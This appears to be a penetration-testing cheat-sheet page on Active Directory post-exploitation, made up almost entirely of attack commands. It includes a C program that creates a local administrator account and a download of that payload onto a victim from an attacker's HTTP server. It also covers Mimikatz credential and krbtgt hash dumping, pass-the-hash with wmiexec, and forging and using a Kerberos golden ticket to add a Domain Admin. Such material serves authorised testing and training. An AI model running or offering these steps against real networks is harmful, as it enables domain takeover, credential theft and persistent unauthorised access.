🌌Active Directory Post Exploitation

Active Directory Post Exploitation

Access Users Remotely

Xfreerdp

xfreerdp /u:mike /p:P@ssword /d:homeserver.local /v:192.168.56.13 /w:1920 /h:1080 /fonts /smart-sizing

Gathering Info

Cmd

# Get current user's detail
whoami

# View Groups
whoami /groups

# View all users in the domain
net user

Privilege Escalation

Powershell

View Running Services

 Get-CimInstance -ClassName win32_service | Select Name,State,PathName,StartName | Where-Object {$_.State -like 'Running'}

View Start Mode of Services

Get-CimInstance -ClassName Win32_Service -Filter "Name='<service name>'" | Select-Object StartMode

Check Permissions using ICACLS

icacls "File Name/Path"

C Program

Adduser.c

#include<stdio.h>
#include<stdlib.h>

int main()
{

        int i;
        
        i = system("net user peter P@ssword /add");
        i = system("net localgroup administrators peter /add");

        return 0;

}

Compile

x86_64-w64-mingw32-gcc exploit.c -o adduser.exe

# Attacker Machine
python3 -m http.server

# Victim Machine
iwr -Uri http://10.10.10.10/<file.exe> -OutFile <file.exe>

Stealing Credentials

Mimikatz

# Start mimikatz
.\mimikatz.exe

# Dump hahses
privilege::debug

sekurlsa::logonpasswords

Impacket

Wmiexec

impacket-wmiexec -hashes :<NT Hash> domain/user@<IP>

# Vew powershell history
cd C:\users\jack\appdata\roaming\microsoft\microsoft\windows\powershell\psreadline

PsExec

# Accessing the domain controller
.\PSExec64.exe \\dc01 cmd.exe

Forging Golden Tickets

Get krbtgt Hash and Domain SID

.\mimikatz.exe

privilege::debug

# Dump Hashes
lsadump::lsa /patch

Create Golden Ticket

.\mimiktaz.exe

kerberos::purge

# Creating Ticket

kerberos::golden /user:<any user> /domain:homeserver.local /sid:<domain sid> /krbtgt:<krbtgt hash> /ticket:homeserver_golden

Using Golden Ticket

Powershell

.\mimikatz.exe

kerberos::ptt homeserver_golden

misc::cmd

PsExec

PsExec.exe \\dc01 cmd.exe

# Add a user to domain
net user mike P@ssword /add /domain 

# Add a user to domain group
net group "domain admins" mike /add /domain

REFERENCES

https://www.mankier.com/1/xfreerdp
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/icacls
https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service
https://www.netwrix.com/how_golden_ticket_attack_works.html
https://docs.metasploit.com/docs/pentesting/active-directory/kerberos/forge_ticket.html
https://www.youtube.com/watch?v=f8jGhLwCa28&pp=ygUgd2luZG93cyBwZW50ZXN0IGFjdGl2ZSBkaXJlY3Rvcnk%3D
https://www.hackingarticles.in/understanding-guide-mimikatz/
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket

PreviousLoRa-WAN NextC2 In The Cloud

hashtagActive Directory Post Exploitation

hashtagAccess Users Remotely

hashtagXfreerdp

hashtagGathering Info

hashtagCmd

hashtagPrivilege Escalation

hashtagPowershell

hashtagC Program

hashtagShare the Exe

hashtagStealing Credentials

hashtagMimikatz

hashtagImpacket

hashtagForging Golden Tickets

hashtagGet krbtgt Hash and Domain SID

hashtagCreate Golden Ticket

hashtagUsing Golden Ticket

hashtagREFERENCES

Active Directory Post Exploitation

Access Users Remotely

Xfreerdp

Gathering Info

Cmd

Privilege Escalation

Powershell

C Program

Share the Exe

Stealing Credentials

Mimikatz

Impacket

Forging Golden Tickets

Get krbtgt Hash and Domain SID

Create Golden Ticket

Using Golden Ticket

REFERENCES